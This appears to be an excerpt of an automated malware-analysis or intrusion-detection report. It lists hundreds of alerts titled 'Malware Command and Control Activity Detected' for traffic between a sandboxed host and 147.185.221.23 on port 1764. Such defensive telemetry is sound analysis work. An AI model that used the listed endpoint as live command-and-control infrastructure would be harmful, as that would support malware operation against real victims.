                      2024-10-13T19:12:27.103934+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:27.199954+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:27.247103+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:27.331825+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:27.378549+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:27.518166+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:27.539594+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:27.662638+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:27.678513+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:27.837997+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:27.853867+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:28.048964+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:28.094174+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:28.222540+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:28.256790+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:28.367789+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:28.391549+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:28.506135+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:28.549903+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:28.644140+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:28.687767+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:28.790721+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:28.840124+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:28.958698+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:28.971460+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:29.101521+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:29.123963+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:29.246305+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:30.008965+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:30.085857+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:30.150163+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:30.205383+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:30.297031+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:30.369218+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:30.517722+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:30.530430+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:30.648711+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:30.730093+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:30.829401+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:30.875292+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:30.960344+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:30.996382+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:31.079511+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:31.160652+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:31.229612+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:31.281282+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:31.348144+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:31.432884+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:31.473253+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:31.564526+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:31.600811+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:31.688421+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:31.720744+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:31.813899+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:31.887983+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:31.956024+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:32.041630+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:32.152429+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:32.198571+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:32.291137+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:32.330263+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:32.445535+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:32.490992+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:32.637656+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:32.638674+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:32.794370+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:32.974135+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:33.075007+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:33.095840+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:33.187899+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:33.209923+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:33.321634+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:33.333437+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:33.447112+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:33.458553+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:33.580065+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:33.599794+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:33.705830+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:33.735832+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:33.834460+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:33.847627+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:33.971928+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:33.997623+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:34.161227+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:34.178627+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:34.304281+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:34.319610+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:34.471841+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:34.474553+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:34.580343+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:34.587500+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:34.705441+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:34.708656+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:34.824783+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:34.828536+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:35.002318+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:35.002442+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:35.300151+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:35.300285+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:35.915475+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:35.921440+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:36.056195+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:36.083186+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:36.194727+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:36.217021+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:36.343022+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:36.355244+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:36.522191+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:36.522288+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:36.666956+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:36.667007+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:36.790960+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:36.838304+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:36.974323+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:36.978009+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:37.353794+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:37.358012+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:37.520875+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:37.526507+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:37.669851+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:37.679665+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:37.811597+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:37.885657+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:38.010070+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:38.013906+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:38.137365+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:38.147705+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:38.302499+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:38.326238+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:38.514720+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:38.668937+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:38.994227+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:39.003587+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:39.110804+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:39.118359+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:39.247152+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:39.261605+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:39.498134+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:39.514561+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:39.779265+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:39.830215+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:39.914996+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:39.954359+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:40.114304+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:40.123679+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:40.267196+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:40.369733+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:40.428767+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:40.505626+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:40.548144+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:40.625569+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:40.658480+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:40.735823+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:40.779847+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:40.843779+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:40.891638+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:40.969974+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:41.011378+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:41.086011+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:41.193739+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:41.246736+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:41.504014+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:41.619885+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:41.659876+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:41.737664+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:41.783425+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:41.859701+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:41.901237+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:41.979990+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:42.025388+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:42.104103+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:42.141747+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:42.235072+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:42.277834+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:42.349101+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:42.389947+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:42.469362+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:42.508746+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:42.591859+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:42.629438+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:42.717658+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:42.747902+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:42.830920+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:42.868145+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:42.948579+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:42.977943+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:43.073767+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:43.094013+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:43.194483+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:43.230515+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:43.313694+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:43.377637+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:43.433455+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:43.505123+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:43.553233+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:43.640543+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:43.737831+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:43.817435+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:43.883805+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:44.219137+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:44.414334+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:44.584379+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-13T19:10:18.466044+020028528741Malware Command and Control Activity Detected147.185.221.231764192.168.2.550002TCP
                      2024-10-13T19:10:48.476096+020028528741Malware Command and Control Activity Detected147.185.221.231764192.168.2.550002TCP
                      2024-10-13T19:11:18.464123+020028528741Malware Command and Control Activity Detected147.185.221.231764192.168.2.550002TCP
                      2024-10-13T19:11:48.477615+020028528741Malware Command and Control Activity Detected147.185.221.231764192.168.2.550002TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-13T19:10:15.078852+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:15.188293+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:15.313309+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:15.422440+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:15.532050+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:15.641355+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:15.750972+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:15.860004+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:15.969569+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:16.079336+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:16.205022+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:16.316692+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:16.427050+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:16.578175+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:16.695457+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:16.797420+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:16.906878+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:17.016201+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:17.128719+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:17.234860+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:17.346314+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:17.453708+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:17.563041+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:17.672353+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:17.781825+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:17.891198+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:18.000556+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:18.109958+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:18.219825+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:18.328686+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:18.438264+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:18.547331+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:18.656869+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:18.766303+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:18.883111+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:18.984954+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:19.094263+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:19.203672+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:19.313245+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:19.422488+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:19.531810+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:19.641208+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:19.754672+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:19.906384+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:20.020435+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:20.146821+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:20.250635+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:20.359975+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:20.475752+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:20.578733+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:20.688627+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:20.797421+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:20.907327+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:21.016390+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:21.322396+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:21.438037+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:21.547493+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:21.656787+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:21.766218+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:21.875705+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
